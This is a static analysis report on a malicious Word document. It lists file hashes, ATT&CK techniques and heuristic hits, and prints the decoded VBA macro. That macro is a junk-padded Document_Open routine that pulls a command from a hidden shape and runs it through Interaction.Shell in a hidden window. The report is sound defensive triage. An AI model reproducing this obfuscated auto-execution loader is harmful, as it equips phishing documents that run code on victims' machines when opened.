Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7b98a6c22284d5d…

MALICIOUS

Office (OLE)

Size: 135.4 KB
Created: 2018-11-30 20:11:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 39cd2c3d99bb9e87fc7a2b57150f4236
SHA-1: e33c2a2c8fa7dbcc60202b1b50ffdcc18616e375
SHA-256: b7b98a6c22284d5d88e11cb9c86eb8bacf51279d8953372a9fde660b31e64a85
Risk Score: 272

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro that invokes cmd.exe and PowerShell. The `Potential Shell call in VBA` and `Suspicious cmd.exe invocation with execution flag` heuristics both fire, indicating an attempt to execute arbitrary commands. The command-line arguments and the use of PowerShell suggest that the script downloads and executes a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Dkah-6765262-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Dkah-6765262-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched line in script:
                OrGRwDv = CByte(332812892)
    alvtTwo = Array(XciMTmTl, Interaction.Shell(WrGLWSv, AAniRwCiiqi), cjZkYiDr)
       On Error Resume Next
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Matched line in script:
    Attribute VB_Customizable = True
    Private Sub Document_open()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6199 bytes
SHA-256: 73df65fe848036f1c1fa10bcbcc9e2454ed54228eb1daba34e673fce95caf94f
Detection: ClamAV: No threats found
Obfuscation or payload: likely
131 of 209 identifiers look randomly generated (e.g. 'WqBWoZjhG') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kuhciToiBsf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
            StqdsKvQT = Atn(JAsdSfZo)
            FiIuN = CLng(oZkDCUj)
            UqsFVD = Cos(iSlNo)
            WHhimME = CByte(OKwcBD)
            KNQMZjYm = CByte(171724181)
            DkFWPWh = CBool(163439428)
            SRCUQ = fIGfu
            UAPYFVB = 95930298
            zUHIibwpw = CByte(257833514)
   On Error Resume Next
            nlltrPWNj = Atn(XOEKOC)
            OUuizfi = CLng(lpjSAipXc)
            GrfdzY = Cos(jEZFR)
            zZolXN = CByte(qGCDG)
            nufiiqc = CByte(275580303)
            KrkUW = CBool(205607288)
            bJlUVj = LzSKTiApc
            akIBVrO = 270292668
            sPwACqd = CByte(168791401)
   On Error Resume Next
            YbuGO = Atn(YFoANS)
            kYEdY = CLng(QiWqp)
            WFjhKHOju = Cos(UPdHTibva)
            NMBVcJ = CByte(wpbBlFIr)
            oXdtw = CByte(234535269)
            mEpzRm = CBool(227149777)
            bPVlK = NFBXP
            SviKVPKtD = 113404778
            VdAOQnJS = CByte(78530423)
Set aWkWhE = Shapes("ErzfIAGl")
   On Error Resume Next
            nkPXPi = Atn(kQfEuWJEf)
            VXSVWN = CLng(DRCJMp)
            TiEYqj = Cos(qolEuG)
            LAkEAwOu = CByte(uRWvTzbpX)
            LkMRlNv = CByte(52563938)
            jhQbHkr = CBool(110373146)
            FMsFYl = HTort
            vhTuwz = 234891939
            qEokLPipP = CByte(72085237)
   On Error Resume Next
            YwpduhDZj = Atn(qVCflwEbL)
            izZSbMXYw = CLng(EwSLiW)
            slkADjL = Cos(pUFCpU)
            KFSYY = CByte(CiJibQv)
            DrAPaLqbq = CByte(176494022)
            NFmsSV = CBool(58170021)
            DmNsGzAqC = VcPQTld
            nOIKi = 98601421
            FLRPprJSS = CByte(288591306)
WrGLWSv = aWkWhE.TextFrame.ContainingRange
   On Error Resume Next
            quaQHoH = Atn(ZDkDMFC)
            UEIAYCL = CLng(GllUZIFi)
            rztzSm = Cos(tpGMp)
            OSZdjmo = CByte(GojmJVDmw)
            wCmUHJ = CByte(156056469)
            RDHjw = CBool(336078167)
            jXSvvZStY = JKKJRBGq
            NmnuLPGhV = 240402519
            Wrkpcwkq = CByte(21100133)
   On Error Resume Next
            cLNwizb = Atn(fZrLhl)
            EGCjTRuP = CLng(DbbBjfarz)
            oEZAziwrh = Cos(BdnwAafwz)
            EhvRvH = CByte(ZkAwANl)
            fiGCCVaNY = CByte(306291966)
            niAJAit = CBool(227564134)
            GJIFsFYGh = BQCzVvYtu
            dUXXVTuYa = 338239543
            GispWW = CByte(7332469)
   On Error Resume Next
            mRkmwnwI = Atn(YaUjqEBCr)
            wvGYp = CLng(HTKpovfGP)
            GwKBWpif = Cos(IuMWThEw)
            Eofsvqo = CByte(oSKduO)
            DzCrqh = CByte(61639507)
            blhBuz = CBool(284007824)
            jwGBb = NDUMC
            PVJNj = 315670917
            VfNHrv = CByte(176678149)
Const AAniRwCiiqi = 0
   On Error Resume Next
            OzTwr = Atn(nvvVupuF)
            PiniUV = CLng(jaREwasbb)
            EzqMRjrXd = Cos(YwTsYnujN)
            MMlPOtimn = CByte(DUuEkz)
            EzvvKr = CByte(164615537)
            lGZfIjI = CBool(88325752)
            csLawYFE = QtDDPHbX
            lStCVMod = 255033947
            HijuG = CByte(57217643)
   On Error Resume Next
            XQqjlaq = Atn(IwAMrC)
            aKuDIszdJ = CLng(GiLWzGc)
            wVSGZOF = Cos(IpSKwhV)
            CdCaKiZ = CByte(hIfvfwIq)
            ptjaTkf = CByte(329501148)
            jIKwaZIl = CBool(132885167)
            DBMTvfZ = jJvMjc
            HnozitWc = 184382348
            RcihFntcn = CByte(256524343)
   On Error Resume Next
            ljqdMmc = Atn(iuUurbiEs)
            HotcIqL = CLng(FtKzuBsJk)
            fLBSXEcvL = Cos(pbVqkzM)
            bIXzSN = CByte(inizSChr)
            YjYoRoAM = CByte(206786759)
            JdYUPuoa = CBool(222044898)
            ZjsnloR = wsWHkiSDa
            AnIKUfE = 24477981
            TOFib = CByte(339730417)
   On Error Resume Next
            QClNCF = Atn(wfbBUzZSa)
            VtZUbzi = CLng(BiLVizjXK)
            jFAsDWWu = Cos(nBaqoTIu)
            kzpFG = CByte(BamcBi)
            znslUXc = CByte(276624050)
            zhJqt = CBool(173267957)
            WCVCXmLs = whrdjut
            SDnwC = 332392668
            RThBHvQZ = CByte(175884099)
   On Error Resume Next
            djarNuq = Atn(WqBWoZjhG)
            zuVWPi = CLng(iwtihzZm)
            SKCWAH = Cos(JiIsvMaS)
            oDFDCGRv = CByte(jwwRo)
            bkZHVfjLs = CByte(76245296)
            oHlrRV = CBool(178924155)
            stUiMLtHS = ImstOR
            mTwAFr = 90068121
            qSJKMRcVR = CByte(315669904)
   On Error Resume Next
            oWMQAUmCl = Atn(puWrhZmD)
            PCILS = CLng(zdTVZqNuK)
            ckimtDjzY = Cos(HEDwrJri)
            rjLuaBrS = CByte(LzbzLwFo)
            RJLVK = CByte(254717930)
            iuaUdQwi = CBool(46700314)
            OQqElC = zmbLHtGt
            BaZbW = 146854468
            OrGRwDv = CByte(332812892)
alvtTwo = Array(XciMTmTl, Interaction.Shell(WrGLWSv, AAniRwCiiqi), cjZkYiDr)
   On Error Resume Next
            pJWUK = Atn(ttijS)
            LwLmpGVC = CLng(FzXZuCat)
            wLwAS = Cos(fPIOstBK)
            DMUVKNA = CByte(tRjJwv)
            ATAZkG = CByte(270343068)
            idGazH = CBool(66656967)
            EpsVhiEiv = wDjiYhTtO
            tbaYOCp = 292297407
            nDIia = CByte(199832818)
   On Error Resume Next
            znPdaun = Atn(jwPwdBE)
            TCZDmVrU = CLng(SqAwNs)
            aVfbEiEwY = Cos(bwZWf)
            zpaJW = CByte(ocwuM)
            DmjTG = CByte(123892300)
            HVdhpzb = CBool(205175796)
            tvvtmnBI = jZUhDiKR
            ulUIpGzXh = 144274396
            lLvbC = CByte(227563495)
End Sub